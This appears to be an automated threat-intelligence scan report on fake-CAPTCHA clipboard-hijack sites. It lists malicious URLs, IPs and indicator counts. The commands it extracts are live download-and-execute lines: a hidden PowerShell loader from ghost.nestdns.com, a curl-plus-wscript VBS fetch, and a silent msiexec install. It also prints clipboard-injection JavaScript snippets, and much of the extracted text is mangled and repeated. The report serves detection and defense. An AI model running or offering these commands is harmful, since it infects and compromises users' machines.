Threat Intelligence Report

📅 December 29, 2025 🕒 Generated: 2025-12-29 03:01:10 🔍 Sites Analyzed: 41
⬇️ Download JSON Report 📁 View All Reports on GitHub
🌐
41
Total Sites Analyzed
⚠️
22
Malicious Sites
54.0% detection rate
💻
12
PowerShell Commands
📋
112
Clipboard Hijacks
📊
388
Avg Threat Score

Attack Pattern Analysis

4
High Risk Commands
73
Base64 Encoded
0
Obfuscated JS
10
Inline JS Redirects
0
External JS Chains
8
Redirect Follows
PowerShell Commands 12
Clipboard Hijacks 112
Base64 Encoded 73
CAPTCHA Elements 64
High Risk Commands 4
JS Redirects 10

Top Indicators/Keywords

failed_to_retrieve (8) robot (3) hidden (3) exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator) (2) exec( (2) Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_`b�ceg��di�jimo�hpquruvwy{|}~������������������#�����-�&��)�������K ����.���aZ���^������z�����[�����A�������������� (1) invoke (1) .EXE (1) .exe (1) Bitmap (1) bitmap (1) CAPTCHA Verification (1) Verification Hash (1) I am not a robot (1) Robot (1)

Malicious Sites Detected

Click on a site to view detailed analysis
https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha/
320 indicators detected
Score: 4521
25
base64
6
suspicious keywords

🔍 Suspicious Keywords 6

Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_`b�ceg��di�jimo�hpquruvwy{|}~������������������#�����-�&��)�������K ����.���aZ���^������z�����[�����A��������������
invoke
.EXE
.exe
Bitmap
bitmap

🌐 Extracted URLs 13

https://github.com/MhoDialogBitmapdialogARPCONTACTWhirligigWindowsTypeNT40DisplayWindows
http://t2.symcb.com0U
http://t1.symcb.com/ThawtePCA.crl0
http://tl.symcb.com/tl.crl0U
https://www.thawte.com/cps0/+0#
https://3ac.conohawing.com
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

💻 PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

🔍 Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://152.118.148.122
70 indicators detected
Score: 574 PowerShell Clipboard Hijack
1
powershell
6
clipboard
3
captcha
2
base64
19
suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 5

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://202.74.75.181
70 indicators detected
Score: 574 PowerShell Clipboard Hijack
1
powershell
6
clipboard
3
captcha
2
base64
19
suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 5

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://79.174.93.250
70 indicators detected
Score: 574 PowerShell Clipboard Hijack
1
powershell
6
clipboard
3
captcha
2
base64
19
suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 5

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://185.80.0.36
70 indicators detected
Score: 574 PowerShell Clipboard Hijack
1
powershell
6
clipboard
3
captcha
2
base64
19
suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 5

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://43.135.162.33
70 indicators detected
Score: 574 PowerShell Clipboard Hijack
1
powershell
6
clipboard
3
captcha
2
base64
19
suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 5

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://81.177.139.97
70 indicators detected
Score: 574 PowerShell Clipboard Hijack
1
powershell
6
clipboard
3
captcha
2
base64
19
suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 5

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://35.154.43.19
70 indicators detected
Score: 574 PowerShell Clipboard Hijack
1
powershell
6
clipboard
3
captcha
2
base64
19
suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 5

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://172.191.195.85
65 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
16
suspicious keywords

🔍 Suspicious Keywords 16

command = 'msiexec /i http://inkbookwriters.com/verify /qn';
exec /i http://inkbookwriters.com/verify /qn';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://inkbookwriters.com/verify
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://216.172.170.236
65 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
16
suspicious keywords

🔍 Suspicious Keywords 16

command = 'msiexec /i http://inkbookwriters.com/verify /qn';
exec /i http://inkbookwriters.com/verify /qn';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://inkbookwriters.com/verify
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://54.197.245.249
65 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
16
suspicious keywords

🔍 Suspicious Keywords 16

command = 'msiexec /i http://inkbookwriters.com/verify /qn';
exec /i http://inkbookwriters.com/verify /qn';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://inkbookwriters.com/verify
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://20.92.160.27
65 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
16
suspicious keywords

🔍 Suspicious Keywords 16

command = 'msiexec /i http://inkbookwriters.com/verify /qn';
exec /i http://inkbookwriters.com/verify /qn';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://inkbookwriters.com/verify
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://203.158.141.64
65 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
16
suspicious keywords

🔍 Suspicious Keywords 16

command = 'msiexec /i http://inkbookwriters.com/verify /qn';
exec /i http://inkbookwriters.com/verify /qn';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://inkbookwriters.com/verify
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://209.250.2.244
65 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
16
suspicious keywords

🔍 Suspicious Keywords 16

command = 'msiexec /i http://inkbookwriters.com/verify /qn';
exec /i http://inkbookwriters.com/verify /qn';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://inkbookwriters.com/verify
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://203.161.63.39
65 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
16
suspicious keywords

🔍 Suspicious Keywords 16

command = 'msiexec /i http://inkbookwriters.com/verify /qn';
exec /i http://inkbookwriters.com/verify /qn';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://inkbookwriters.com/verify
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://66.39.17.31
65 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
16
suspicious keywords

🔍 Suspicious Keywords 16

command = 'msiexec /i http://inkbookwriters.com/verify /qn';
exec /i http://inkbookwriters.com/verify /qn';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://inkbookwriters.com/verify
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://162.55.94.68
65 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
16
suspicious keywords

🔍 Suspicious Keywords 16

command = 'msiexec /i http://inkbookwriters.com/verify /qn';
exec /i http://inkbookwriters.com/verify /qn';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://inkbookwriters.com/verify
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://3.71.235.243
65 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
16
suspicious keywords

🔍 Suspicious Keywords 16

command = 'msiexec /i http://inkbookwriters.com/verify /qn';
exec /i http://inkbookwriters.com/verify /qn';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://inkbookwriters.com/verify
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://82.146.62.232/
49 indicators detected
Score: 357 Fake CAPTCHA Redirect Chain
3
captcha
6
base64
1
redirects
1
redirect follows
4
suspicious keywords

🔍 Suspicious Keywords 4

exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)
robot
exec(
hidden

🌐 Extracted URLs 15

https://svetvip.ru/
https://api.whatsapp.com/send?phone=79258627909
https://api.whatsapp.com/send?phone=79258627909
https://svetvip.ru/catalog/vstraivaemye_svetilniki/
https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/

🛰️ Redirect Follower Findings (1)

Source: inline_js
Method: script_src
new Image().src='https://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5ODA4MTIwNQEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAEwNTViMTliODIxZDE3MGE3MDZjMmJiM2M3ZTAxNjY2OQExNzk4MDgxMjA1AS8BAQEC&k=86cabf11693973f2093a490c888f3abd';
Status: ok
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at svetvip.ru Port 80</address>
</body></html>

Showing top 20 malicious sites. 2 additional sites detected.